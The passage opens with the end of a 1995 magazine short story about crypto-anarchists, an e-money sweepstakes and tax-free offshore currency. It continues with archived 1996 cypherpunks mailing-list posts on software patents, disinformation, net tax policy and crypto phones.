And they're going to step all over your family in the process."

"Why?"

"Because if they don't destroy E-money," Codex says, "E-money will
destroy them."

The next afternoon I show up at my brother's office, in a groovily
refurbished ex-power plant on the near West Side. He finishes rolling
some calls and then waves me into his office, a cavernous space with a
giant steam turbine as a conversation piece. I think it's supposed to
be an irony thing.

"Aren't you supposed to be cruising the I-way for stalled motorists?"
he says.

"Spare me the fraternal heckling," I say. "We crypto-anarchists don't
have time for such things."

"Crypto-anarchists?"

"The word panarchist is also frequently used."

"Cute," he says, rolling the word around in his head. He's already
working up a mental ad campaign for it.

"You're looking flushed and satisfied this afternoon," I say. "Must
have been those two imperial pints of Hog City Porter you had with
your baby-back ribs at Divane's Lakeview Grill."

Suddenly he sits up straight and gets an edgy look about him, as if a
practical joke is in progress, and he's determined not to play the
fool.

"So how'd you know what I had for lunch?"

"Same way I know you've been cheating on your taxes."

"What!?"

"Last year you put a new tax-deductible sofa in your home office. But
that sofa is a hide-a-bed model, which is a no-no."

"Hackers," he says. "Your buddies hacked into my records, didn't
they?"

"You win the Stratolounger."

"I thought they had safeguards on these things now."

"The files are harder to break into. But every time information gets
sent across the wires - like, when Anne uses Raster to do the taxes -
it can be captured and decrypted. Because, my brother, you bought the
default data-security agreement with your box, and the default
agreement sucks."

"So what are you getting at?"

"For that," I say, "we'll have to go someplace that isn't under
surveillance."

"Surveillance!? What the . . . " he begins. But then I nod at the TV
in the corner of his office, with its beady glass eye staring out at
us from the set-top box.

We end up walking along the lakeshore, which, in Chicago in January,
is madness. But we hail from North Dakota, and we have all the
cold-weather gear it takes to do this. I tell him about Raster and the
cable company.

"Oh, Jesus!" he says. "You mean those numbers aren't secret?"

"Not even close. They've been put in the hands of 27 stooges hired by
the the government. The stooges have already FedEx'd their entry forms
with the correct numbers. So, as of now, all of your Simoleons - $27
million worth - are going straight into the hands of the stooges on
Super Bowl Sunday. And they will turn out to be your worst
public-relations nightmare. They will cash in their Simoleons for
comic books and baseball cards and claim it's safer. They will
intentionally go bankrupt and blame it on you. They will show up in
twos and threes on tawdry talk shows to report mysterious
disappearances of their Simoleons during Metaverse transactions. They
will, in short, destroy the image - and the business - of your client.
The result: victory for the government, which hates and fears private
currencies. And bankruptcy for you, and for Mom and Dad."

"How do you figure?"

"Your agency is responsible for screwing up this sweepstakes. Soon as
the debacle hits, your stock plummets. Mom and Dad lose millions in
paper profits they've never had a chance to enjoy. Then your big
shareholders will sue your ass, my brother, and you will lose. You
gambled the value of the company on the faulty data-security built
into your set-top box, and you as a corporate officer are personally
responsible for the losses."

At this point, big brother Joe feels the need to slam himself down on
a park bench, which must feel roughly like sitting on a block of dry
ice. But he doesn't care. He's beyond physical pain. I sort of
expected to feel triumphant at this point, but I don't.

So I let him off the hook. "I just came from your accounting firm," I
say. "I told them I had discovered an error in my calculations - that
my set-top box had a faulty chip. I supplied them with 27 new numbers,
which I worked out by hand, with pencil and paper, in a conference
room in their offices, far from the prying eye of the cable company. I
personally sealed them in an envelope and placed them in their vault."

"So the sweepstakes will come off as planned," he exhales. "Thank
God!"

"Yeah - and while you're at it, thank me and the panarchists," I shoot
back. "I also called Mom and Dad, and told them that they should sell
their stock - just in case the government finds some new way to
sabotage your contest."

"That's probably wise," he says sourly, "but they're going to get
hammered on taxes.  They'll lose 40% of their net worth to the
government, just like that."

"No, they won't," I say. "They aren't paying any taxes."

"Say what?" He lifts his chin off his mittens for the first time in a
while, reinvigorated by the chance to tell me how wrong I am. "Their
cash basis is only $10,000 - you think the IRS won't notice $20
million in capital gains?"

"We didn't invite the IRS," I tell him. "It's none of the IRS's damn
business."

"They have ways to make it their business."

"Not any more. Mom and Dad aren't selling their stock for dollars,
Joe."

"Simoleons? It's the same deal with Simoleons - everything gets
reported to the government."

"Forget Simoleons. Think CryptoCredits."

"CryptoCredits? What the hell is a CryptoCredit?" He stands up and
starts pacing back and forth. Now he's convinced I've traded the
family cow for a handful of magic beans.

"It's what Simoleons ought to be: E-money that is totally private from
the eyes of government."

"How do you know? Isn't any code crackable?"

"Any kind of E-money consists of numbers moving around on wires," I
say. "If you know how to keep your numbers secret, your currency is
safe. If you don't, it's not.  Keeping numbers secret is a problem of
cryptography - a branch of mathematics. Well, Joe, the
crypto-anarchists showed me their math. And it's good math. It's
better than the math the government uses. Better than Simoleons' math
too. No one can mess with CryptoCredits."

He heaves a big sigh. "O.K., O.K. - you want me to say it? I'll say
it. You were right. I was wrong. You studied the right thing in
college after all."

"I'm not worthless scum?"

"Not worthless scum. So. What do these crypto-anarchists want,
anyway?"

For some reason I can't lie to my parents, but Joe's easy. "Nothing,"
I say. "They just wanted to do us a favor, as a way of gaining some
goodwill with us."

"And furthering the righteous cause of World Panarchy?"

"Something like that."

Which brings us to Super Bowl Sunday. We are sitting in a skybox high
up in the Superdome, complete with wet bar, kitchen, waiters and big
TV screens to watch the instant replays of what we've just seen with
our own naked, pitiful, nondigital eyes.

The corporate officers of Simoleons are there. I start sounding them
out on their cryptographic protocols, and it becomes clear that these
people can't calculate their gas mileage without consulting Raster,
much less navigate the subtle and dangerous currents of cutting-edge
cryptography.

A Superdome security man comes in, looking uneasy. "Some, uh,
gentlemen here," he says. "They have tickets that appear to be
authentic."

It's three guys. The first one is a 300 pounder with hair down to his
waist and a beard down to his navel. He must be a Bears fan because he
has painted his face and bare torso blue and orange. The second one
isn't quite as introverted as the first, and the third isn't quite the
button-down conformist the other two are. Mr. Big is carrying an old
milk crate.  What's inside must be heavy, because it looks like it's
about to pull his arms out of their sockets.

"Mr. and Mrs. De Groot?" he says, as he staggers into the room. Heads
turn towards my mom and dad, who, alarmed by the appearance of these
three, have declined to identify themselves. The guy makes for them
and slams the crate down in front of my dad.

"I'm the guy you've known as Codex," he says. "Thanks for naming us as
your broker."

If Joe wasn't a rowing-machine abuser, he'd be blowing aneurysms in
both hemispheres about now. "Your broker is a half-naked
blue-and-orange crypto-anarchist?"

Dad devotes 30 seconds or so to lighting his pipe. Down on the field,
the two-minute warning sounds. Dad puffs out a cloud of

smoke and says, "He seemed like an honest sloth."

"Just in case," Mom says, "we sold half the stock through our broker
in Bismarck. He says we'll have to pay taxes on that."

"We transferred the other half offshore, to Mr. Codex here," Dad says,
"and he converted it into the local currency - tax free."

"Offshore? Where? The Bahamas?" Joe asks.

"The First Distributed Republic," says the big panarchist. "It's a
virtual nation-state. I'm the Minister of Data Security. Our official
currency is CryptoCredits."

"What the hell good is that?" Joe says.

"That was my concern too," Dad says, "so, just as an experiment, I
used my CryptoCredits to buy something a little more tangible."

Dad reaches into the milk crate and heaves out a rectangular object
made of yellow metal.  Mom hauls out another one. She and Dad begin
lining them up on the counter, like King and Queen Midas unloading a
carton of Twinkies.

It takes Joe a few seconds to realize what's happening. He picks up
one of the gold bars and gapes at it. The Simoleons execs crowd around
and inspect the booty.

"Now you see why the government wants to stamp us out," the big guy
says. "We can do what they do - cheaper and better."

For the first time, light dawns on the face of the Simoleons CEO.
"Wait a sec," he says, and puts his hands to his temples. "You can rig
it so that people who use E-money don't have to pay taxes to any
government? Ever?"

"You got it," the big panarchist says. The horn sounds announcing the
end of the first half.

"I have to go down and give away some Simoleons," the CEO says, "but
after that, you and I need to have a talk."

The CEO goes down in the elevator with my brother, carrying a box of
27 smart cards, each of which is loaded up with secret numbers that
makes it worth a million Simoleons. I go over and look out the skybox
window: 27 Americans are congregated down on the 50-yard line, waiting
for their mathematical manna to descend from heaven. They are just the
demographic cross section that my brother was hoping for. You'd never
guess they were all secretly citizens of the First Distributed
Republic.

The crypto-anarchists grab some Jolt from the wet bar and troop out,
so now it's just me, Mom and Dad in the skybox. Dad points at the
field with the stem of his pipe. "Those 27 folks down there," he says.
"They didn't get any help from you, did they?"

I've lied about this successfully to Joe. But I know it won't work
with Mom and Dad.  "Let's put it this way," I say, "not all
panarchists are long-haired, Jolt-slurping maniacs.  Some of them look
like you - exactly like you, as a matter of fact."

Dad nods; I've got him on that one.

"Codex and his people saved the contest, and our family, from
disaster. But there was a quid pro quo."

"Usually is," Dad says.

"But it's good for everyone. What Joe wants - and what his client
wants - is for the promotion to go well, so that a year from now,
everyone who's watching this broadcast today will have a high opinion
of the safety and stability of Simoleons. Right?"

"Right."

"If you give the Simoleons away at random, you're rolling the dice.
But if you give them to people who are secretly panarchists - who have
a vested interest in showing that E-money works - it's a much safer
bet."

"Does the First Distributed Republic have a flag?" Mom asks, out of
left field. I tell her these guys look like sewing enthusiasts. So,
even before the second half starts, she's sketched out a flag on the
back of her program. "It'll be very colorful," she says. "Like a jar
of jelly beans."

Copyright 1995 Time Inc. All rights reserved.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M Hallam-Baker" <hallam@ai.mit.edu>
Date: Fri, 22 Nov 1996 15:46:48 -0800 (PST)
To: "Alan Pugh" <Alan.Pugh@MCI.Com>
Subject: Software distribution the cypherpunks way? Was: Patent Fight Could Add to Cost of Inter
Message-ID: <199611222346.PAA19251@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This turned into a long article on software distribution.

> NEW YORK (AP) _ A little-known patent could raise the cost of 
> doing business over the Internet for companies selling software, 
> video or other digital products delivered online. 
> 
> E-Data Corp. of Secaucus, N.J., is suing 17 companies, including 
> McGraw-Hill and CompuServe, to collect licensing fees on the 
> patent, which protects downloading of encrypted digital 
> information. A court hearing is scheduled Dec. 6 in New York on the 
> company's claims. 

Although this is one of the most bogus and indefensible patent claims
about I don't think it has any material bearing on the Web. Any that
it does have is likely to be beneficial since the Freeny model is 
inherently broken and non-Web.

What Freeny does is to claim the idea of encrypting an information 
product, delivering it through a computer network (though not a
physical medium, there is another patent that claims that), and selling
the decryption key rather than the product. It is a hot idea if you are
trapped in traditional, pre-Web thinking but not if you understand
the dynamics of the net.

The problem is that encryption is not such a great barrier to 
preventing proliferation of software. If encryption is free than you 
might as well add it in, if there are patent costs then you have
to ask what precisely you gain from encryption. The problem is that 
the information good has to be decrypted before use. Since it is
very difficult to prevent copying after the decryption has occurred
all that the encryption is really doing is to slow down the process
of proliferation.

A more important question is what if anything one gains from 
preventing proliferation. Microsoft has not been hurt by the massive
bootleg copying of its software, far from it. Many business users
are keen to buy non copy protected software because they can then
obtain a "free" copy for their home machine at no cost to 
themselves. This minor peculation is in my view the principle reason 
for the dominance of the PC in the home market. There is no good
reason why a person would buy a $2000 business machine rather
than a $500 home machine when the latter plays much better games.
But add the idea that one can use the software bought by one's 
employer and the PC looks the better buy.

I believe that the success of Netscape demonstrates that copy 
protection is a bad idea. If you believe in free markets then 
the price of any given product is going to come down to the marginal
cost of production. For software sold via the net the marginal
cost is pretty close to zero. The price of the various "Office" 
bundles sold via the stores is astonishingly low. $200 for MSOffice
or Corel Office is a silly price. If the product is bundled with
the machine the price gets even sillier - a few dollars. I expect
that before long we will see machines coming bundled with more than
one office suite because the prices are just too low to make the 
choice irrelevant. 

An important fact to bear in mind is that companies are in general
interested in being honest. There is little incentive for an 
employee to cheat the software vendor. The cost of lawsuits is a
good deterrence since the type of company where management are
likely to encourage software theft is also the type of company
that is likely to have disgruntled ex-employees willing to inform.
As a system manager my principle interest in net O/S such as 
WNT and VMS is that they have good, centralized and standardized
licensing mechanisms that allow me to make sure that the software
has been paid for. Its another reason why site licenses are useful!

The price of net software is likely to be close to the price
the OEM pays, a few dollars. This is likely to be structured
somewhat differently however. I expect to see growth of two 
trends, software rental and componentware.

Componentware, selling the package in small increments is a
poor proposition if selling via physical media. The cost of
a CDROM is low, (few cents), but the cost of post and packing
is high. Selling componentware via the net is considerably more 
interesting. Just as I paid a few bucks for my XV program,
I'm willing to pay a couple of bucks for additional input 
filters. I'd certainly be willing to pay a couple of bucks
for specialized document tools or specialized canned document 
formats (e.g. IDEF0, ESA-Requirements whatever). I see the
potential for componentware being primarily low cost, high
volume. 

Componentware is now on the brink of being practical for three
reasons. First as previously stated the net makes distribution
costs lower. Second modern software applications are considerably
more "open" to extension than previously. In the past most
software houses attempted to produce products that satisfied every
need. Today the large software houses realize that they cannot
hope to satisfy every need but that if they can cover 95% of
a persons needs in a way that allows them to add in the remaining
5% everyone is happy. Finally, Java has legitimized the 
componentware idea. Its worth noting that the technical suitability
of Java to the task is irrelevant. What is important is the fact
that several hundred startup companies have been created to do 
nothing else than make Java applets. Such companies are effectively
committed to make componentware work and it is inevitable that
at least one will succeed in establishing a paradigm for the
others to copy.

The second interesting development is software rental. To 
an extent this already occurs since the rapid rate of software
development means that software rapidly becomes obsolete. Anyone
who is using WordPerfect 3.1 for more than a few hours a year
should probably upgrade to the latest version simply because it 
offers so much more functionality. The recent move by Microsoft
to incorporate the year into their products is intended to 
encourage frequent software upgrades. It is a small step from
this model to one in which software is "leased" for a period of
a year or more at a time.


Of course both componentware and rental strategies have been 
around before the net existed. What the net does is to change
the economics so that low cost, high volume is the mainstream
strategy. Software rental traditionally involves expensive
agreements, typically brokered by lawyers on both sides. The
network means that it will become economic to rent software
in low volume and for short periods.

Joining the componentware and rental strategies together would
point to a distribution strategy in which a corporation would 
lease a certain number of seats worth of fully updated packages.
The seats would be continuously updated on a daily basis as 
additional components passed the supplier's QA.

In this model the purchaser is buying the up-todateness 
of the package. There would be little value in bootlegging
the software since its unlikely that the bootleg version 
would be anything like as convenient.

There would also be scope for different levels of uptodateness.
Just as the Microsoft developer network delivers a bulging binder 
full of CDs to my desk each quarter there will inevitably be a 
large number of developers willing to risk buggy software to 
have access to the cutting edge technology. On the other hand 
there will be people who prefer to wait until others have found 
the bugs, waiting a judicious length of time before updating
unless a patch is a response to a known bug.

Encrypting the distribution process might be worthwhile to 
reduce fraud but the main vulnerability is probably
unauthorized copying after distribution. 


What the Freeny patent covers is thus the old model of software
distribution in the new sales paradigm. There is little point in
taking costly measures to protect the copyright of products 
being sold for small dollar amounts. First Virtual proves this.

Where more expensive software is concerned it would ideally be
best to use the net. But here the price of the patent is simply
too much. The 1% extorted under the patent would easily pay
an intern to stuff a CD in an envelope and send it.


The role for encryption in the software distribution process
is in authenticating the delivered goods. The role of encryption 
is to provide privacy. It is very hard to keep a secret that
every one knows about, still harder to sell information  that is
public knowledge. The net is not an information economy, it
is an access to information technology. Nobody will profit
from merely selling information, they will have to sell 
the ability to access information in better ways, better indexing,
faster access, lower publication delays and so on.

comments?

		Phill

PS in checking this document Microsoft's spellchecker suggested
"Mosaic" when checking the word MSOffice!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Fri, 22 Nov 1996 09:45:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: re: sci fi
In-Reply-To: <3.0.32.19961121233535.0106ea44@mail.teleport.com>
Message-ID: <Pine.HPP.3.91.961122184210.9205A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Nov 1996, Alan Olsen wrote:

> For absolute brain candy, I recommend "Star Smashers of the Galaxy
> Rangers".  EE.Doc Smith meets the Hardy Boys.  The ending I had to read
> twice...

A rather odd book that I found immensely stimulating is
'Venus on a halfshell' by a Nym (allegedly for Kurt Vonnegut,
who in most of his books under his own name now and then
refers to some hilarious non-existing SF story by this 'author').

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erp <erp@digiforest.com>
Date: Fri, 22 Nov 1996 18:18:32 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: HP-48G is a perfect toy, thanks to all
In-Reply-To: <199611222201.QAA09675@manifold.algebra.com>
Message-ID: <Pine.LNX.3.95.961122185045.12273B-100000@digital.digiforest.com>
MIME-Version: 1.0
Content-Type: text/plain





On Fri, 22 Nov 1996, Igor Chudov @ home wrote:

> Thanks to all who recommended me to buy an HP-48G calculator.

Should have bough the HP-48GX Graphing Calculator.

> It is one of the most perfect toys that an adult can play with.

There extremely fun!  But the GX holds better more and cooler games...

> 
> I used a programmable stack calculator when I was in high school
> and it is a true pleasure.

Eek -- and how long ago was this *grin*....  Just had to ask that..

> 
> 	- Igor.
> 

Anyways even though the GX is around 215$ ---  and the G is only 80$..
The GX is by far worth it.... 

Ok thats my Two Pence, later...

Erp





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 22 Nov 1996 16:10:58 -0800 (PST)
To: Sean Roach <adam@homeport.org>
Subject: Re: Why I Don't Read SF Much Anymore
In-Reply-To: <199611221950.LAA15893@toad.com>
Message-ID: <v0300783eaebbf148e103@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:25 pm -0500 11/22/96, Robert Hettinga wrote:
>I've got an offer of sending me an electronic copy in progress. I'll dump
>it to thumper when I get it and blatantly violate a few copyrights when I
>get it. :-).

Looks like I don't have to do *that* anymore.

Thanks, Adam!

Cheers,

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The CNET newsletter <dispatch@cnet.com>
Date: Fri, 22 Nov 1996 20:39:46 -0800 (PST)
To: Multiple recipients of list NEWS-DISPATCH             <NEWS-DISPATCH@DISPATCH.CNET.COM>
Subject: CNET News Dispatch  November 22, 1996
Message-ID: <199611230418.UAA17158@cappone.cnet.com>
MIME-Version: 1.0
Content-Type: text/plain


*************************************

CNET NEWS DISPATCH/SPECIAL COMDEX ISSUE
Friday, November 22, 1996
San Francisco, California, USA

*************************************

Welcome to the sixth and last in a series of SPECIAL COMDEX ISSUES of the
CNET NEWS DISPATCH, bringing you the latest on the people, products, and
parties at this exciting event. Check out our Comdex page at:

http://www.news.com/Categories/Index/0%2C3%2C38%2C00.html?nd

*************************************

CNET NEWS DISPATCH is a daily newsletter that summarizes the up-to-the
minute technology news presented by CNET's NEWS.COM. It tempts readers with
coverage of today's hottest stories, news in the making, (in)credible
rumors, and other indispensable information.

For complete versions of the stories updated all day long, head over to:

   http://www.news.com/?nd

*************************************

CONTENTS

SCOOPS AND TOP STORIES
     AOL tries to play "The Price is Right" with customers
     Microsoft catches up to its own browser in Macland
     Gates & Grove prove great minds think and clink alike
     It puts the whole...world...in your lap
     Despite IPO mishaps, tech firms still getting VC $$$

ANNOUNCEMENTS
     An easy way for you to customize NEWS.COM
     Search the site for particular topics and articles
     Send us your questions, comments, flotsam, and jetsam
     How to subscribe and unsubscribe
     Late-breaking stories just a click away with Desk Top News

*************************************

AOL TRIES TO PLAY "THE PRICE IS RIGHT" WITH CUSTOMERS
As if he didn't have enough to worry about--blackouts, churn, the growth of
the Web--Steve Case and friends are also wrangling with attorneys generals
in 17 states. The problem is AOL's new pricing policy, which can be summed
up as: "Unless you say 'no,' your rate goes from $9.95 to $19.95." At pixel
time (previously "press time"), the skirmishes were just beginning.

   http://www.news.com/News/Item/0%2C4%2C5674%2C00.html?nd


MICROSOFT CATCHES UP TO ITS OWN BROWSER IN MACLAND
Explorer for Mac users rejoice! Your hybrid platform/browser choice has just
been significantly enhanced by the arrival of Microsoft's Java Virtual
Machine. Some of the Web's most bleeding-edge firms are now rushing to
embrace this new entrant into the market.

   http://www.news.com/News/Item/0%2C4%2C5675%2C00.html?nd


GATES & GROVE PROVE GREAT MINDS THINK AND CLINK ALIKE
First his friend and business buddy Bill Gates misses, then frantically
swerves to catch, the opportunities of the exploding Internet market. Now
Intel chief Andy Grove seems to have jumped into an exploding market late
enough to possibly fall off. Ironically, the product at the center of this
battle is Windows CE, made by none other than Microsoft itself.

   http://www.news.com/News/Item/0%2C4%2C5676%2C00.html?nd

IT PUTS THE WHOLE...WORLD...IN YOUR LAP
People will buy 190,000 of them this year and 4.1 million by 2000. They come
in 20 varieties and move four times faster than analog modem speeds. It fits
in your pocket, but can take you thousands of miles in seconds.

   http://www.news.com/News/Item/0%2C4%2C5669%2C00.html


DESPITE IPO MISHAPS, TECH FIRMS STILL GETTING VC $$$
You've heard about Wired canceling its IPO. Twice. You've heard that the
VC-money-for-neat-Net-ideas bubble has burst. You've heard about apocalyptic
traffic jams that could choke the Web. But to get the real story on how
investors and venture capitalists feel about Net-related firms nowadays, the
old adage of "follow the money" yields interesting results.

   http://www.news.com/News/Item/0%2C4%2C5673%2C00.html?nd


*************************************

ANNOUNCEMENTS

AN EASY WAY FOR YOU TO CUSTOMIZE NEWS.COM
So many bits, so little time? Sounds like you need Custom News. Identify the
topics, keywords, or sections you're most interested in, and Custom News
will a create a page of headlines and summaries for all stories that match
your criteria. Check it out at:

http://www.news.com/Personalization/Entry/1%2C21%2C%2C00.html?nocache=1


SEARCH THE SITE FOR PARTICULAR TOPICS AND ARTICLES
Search the entire NEWS.COM database for stories you saw in News Dispatch, or
track any story we've run.

   http://www.news.com/Searching/Entry/0%2C17%2C0%2C00.html?nd


SEND US QUESTIONS, COMMENTS, FLOTSAM, AND JETSAM
If you have any questions, suggestions or remarks, send us a message:

   newsdispatch@cnet.com


HOW TO SUBSCRIBE AND TO UNSUBSCRIBE
To subscribe to News Dispatch: Send mail to listserv@dispatch.cnet.com with
the message:

   subscribe news-dispatch (your name)

in the message body. To unsubscribe send the message:

   unsubscribe news-dispatch


LATE-BREAKING STORIES A CLICK AWAY WITH DESK TOP NEWS
How would you like having split-second access to the very latest news on the
Net? Our Desk Top News feature puts our 20 most recent stories right there
on your desktop for you to review at any time. Here's how it works:

1. From any story, click Desk Top News in the top right.
2. A window will open showing our last 20 stories.
3. Click on a headline to display the story.
4. Desk Top News updates itself every 30 minutes.
5. You become known as Ms./Mr. Cyber-Info. It feels good.

   http://www.news.com/Help/Item/0%2C24%2C12%2C00.html?nd


*************************************

CNET: The Computer Network
   http://www.cnet.com/
   http://www.news.com/
   http://www.gamecenter.com/
   http://www.download.com/
   http://www.search.com/
   http://www.shareware.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 23 Nov 1996 09:29:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The persistance of reputation
In-Reply-To: <v03007800aea91c1473f2@[206.119.69.46]>
Message-ID: <v03007802aebc04ebf5f8@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:47 pm -0500 11/14/96, Rich Graves wrote:

>Sorry for the misinterpretation. Clearly your reputation has not
>persisted in my mind with sufficent clarity since the last time I was
>involved in a cypherpunks discussion.

Now you sound like Tim. :-). An end to this dicussion is just a killfile
away. Be my guest.

>  (Or possibly this issue has
>brought together such strange bedfollows that I'm ready to believe that
>anything is possible.)

"C'mon, Kids! Be-LEIVE! Or Tinkerbell's gonna die!"

>I disagree. You're assuming that you're dealing with a rational person
>who wants to be believed. It is not difficult to come up with examples
>of pure disinformation that is just "thrown out there" and never
>supported. Keep repeating the same lie, and *nonspecialists* will assume
>that there is a "debate" going on.

I agree to disagree. The "Big Lie" only works with mass media. On a
ubiquitous geodesic network, all such bets are off.

>No, actually I meant that competing propaganda tends to kill itself --
>normal people tend just to throw up their hands and say "What the hell
>does it matter anyway" -- but your interpretation is worth talking
>about, too.

See above. When you have an avalanche of dissent from lots of different
voices, all with technically the same size "megaphone", it doesn't take a
new kind of reputation calculus (or even rocket science) to get the idea
that FUD by any other name stinks just the same...

>No. It requires both. And sometimes, technical skill. How many people
>here know enough to evaluate the data concerning, to take a notorious
>example, the Kennedy assassination? I accept the historical consensus,
>but I know there are a lot of otherwise rational people on cypherpunks
>who are convinced that there was some sort of coverup (which sort, they
>often don't know or care; but they're conviced there was one). Oliver
>Stone got some ridiculous movie made based on this non-thesis (actually
>two, counting Nixon). People growing up today are learning pseudohistory
>and pseudoscience from Oliver Stone, "The X Files," "Dark Skies," and
>"Millenium." I find that scary. The net is better than TV, because it
>allows more responses, but I'm not sure how much better.

You're citing mass media again. When you have quasimonopolistic control of
a monster-megaphone the truth tends to get drowned out, or at least
homogenized, in the same way that creationism gets homogenized with real
science for "equal time", say.

>No, I think pure disinformation is cheaper. Period. And often, it
>doesn't have to be "believed" -- you just need to raise "suspicions"
>among nonspecialists.  That is sufficent to destroy consensus and trust
>in social institutions.

Again, you're using big-think here, invoking the power of large
hierarchically organized industrial institutions.

The world don't work that way anymore. Or it won't, soon enough.

>I disagree with two of your premises. Knowing several real journalists
>(as opposed to opinion columnists), I don't consider print or broadcast
>to be particularly hierarchical. The difficulty of propagating
>disinformation depends on whether you want people to believe, or merely
>"suspect." The TWA 800 friendly-fire fiction doesn't have to be accepted
>as definitely true for it to cause trouble. The "supicion" of Richard
>Jewell doesn't have to be accepted as definitely true for it to cause
>trouble. Disinformation is more often about sowing fear, uncertainty,
>and doubt than it is about belief. Sold the right way, it can propagate
>itself; the (IMO) disinformation that the CIA is directly responsible
>for the crack-cocaine epidemic is spread by radical blacks who see it as
>a racist crime, and by radical-right conspiracy mongers who want to tie
>Clinton to the Mena story. Either way, the meme virus spreads. How many
>different kinds of groups are saying how many different groups "created"
>the AIDS virus? You don't have to "believe" that it's true for the meme
>to spread.

Whew. Actually. You're proving my point. In a hierarchically organized
media structure, you get lots of feedback loops repeating the same old shit
over and over, all done in order to keep the channel full during the slack
periods. Let's take TWA 800 frendly fire story. It's been lurking in the
same loony.news and mail groups, and most people on the net think it's a
shit-story. However, Pierre Salanger gets wind of it, puts it into the ABC
evening news as gospel, and all the sudden it's a headline. The power of
the megaphone, all over again. They don't call 'em "gatekeepers" for
nothin', bunky.

>To some extent, but not fully. There is a certain cachet in being
>recognized as someone who uses "your real name."

Reputation is reputation, biometric or otherwise. On the net, your key is
who you are, no matter what your "True Name" is... Kind of like Turing(?)
test, only with reputation, I guess.

>Pseudonymity is only perfect where artificial boundaries such as respect
>for netiquette are erected. If someone really wanted to track you down,
>they could either find you, or "out" you as a pseudonym "afraid to use
>your own name." Both can be damaging (to your reputation or otherwise).
>In order to put your life on the line for something, you need a life
>story.

Okay. Then it should be trivial for you to tell me who "Pr0duct
Cypher"(sp?) is...

Have fun.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 22 Nov 1996 18:00:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Report on Net Tax Policy
Message-ID: <1.5.4.32.19961123015800.006dc44c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The US Treasury Department's report "Selected Tax Policy 
Implications of Global Electronic Commerce," reported this 
morning in the NYT, is available at:

     ftp://ftp.fedworld.gov/pub/tel/internet.wp  

     (260 kb; WordPerfect 6.1)

We've prepared an HTML version at:

     http://jya.com/taxpolicy.htm  (140 kb)


Here's the TOC

Section I: Introduction

     Executive Summary
     1. Introduction 

Section II: Technical Background

     2. An Overview of the Global Information Infrastructure 
         or "Information Superhighway"
     3. The World Wide Web and Electronic Commerce
     4. Security and Encryption
     5. Payment Mechanisms 

Section III: Tax Policy and Administration Issues

     6. Tax Policy and Administration Issues: General 
         Considerations
     7. Substantive Tax Law Issues
     8. Tax Administration and Compliance Issues       
     9. Conclusion
     Glossary
     Notes 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 22 Nov 1996 21:41:58 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: RE: Mass-market crypto phones
In-Reply-To: <Pine.3.89.9611221012.A1281-0100000@netcom6>
Message-ID: <Pine.SUN.3.91.961122213735.17357D-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


As Hayek reminded us 50 years ago, even democracies can evolve into a 
totalitarian state.

Be ever vigilant, blah.

-Declan

PS: Over margaritas and enchiladas tonight, I was talking with one of the
crypto-ITAR enforcers from State. I mentioned that I'd be going out of the
country soon and taking my PowerBook laptop. Quite sincerely, he urged me
to keep a record of when I left and when I returned for five years. You
see, I have domestic Netscape Navigator on it. Wacky stuff. 


On Fri, 22 Nov 1996, Lucky Green wrote:

> On Fri, 22 Nov 1996, Peter Trei wrote:
> > It's kind of pathetic - I'm sure that the billions lost to cellular fraud 
> > far outweigh the value of crimes that the  LEA groups have been 
> > able  prevent by preserving their ability to illegally eavesdrop on 
> > cell calls without a warrant.
> 
> The LEA's are not intested in saving the public money. They are 
> interested in preserving and expanding their power. If it costs 
> $1,000,000 per wiretap, who cares? The government has men with guns that 
> can always go out and extort more cash from the population.
> 
> --Lucky
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 22 Nov 1996 21:47:39 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: Report on Net Tax Policy
In-Reply-To: <1.5.4.32.19961123015800.006dc44c@pop.pipeline.com>
Message-ID: <Pine.SUN.3.91.961122214643.17357F-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I started reading it this afternoon and interviewed some folks at 
Treasury about it. Read it. It talks about much of what has been 
discussed on cypherpunks.

-Declan

(And you wonder why *.irs.gov addresses subscribe to this list?)


On Fri, 22 Nov 1996, John Young wrote:

> The US Treasury Department's report "Selected Tax Policy 
> Implications of Global Electronic Commerce," reported this 
> morning in the NYT, is available at:
> 
>      ftp://ftp.fedworld.gov/pub/tel/internet.wp  
> 
>      (260 kb; WordPerfect 6.1)
> 
> We've prepared an HTML version at:
> 
>      http://jya.com/taxpolicy.htm  (140 kb)
> 
> 
> Here's the TOC
> 
> Section I: Introduction
> 
>      Executive Summary
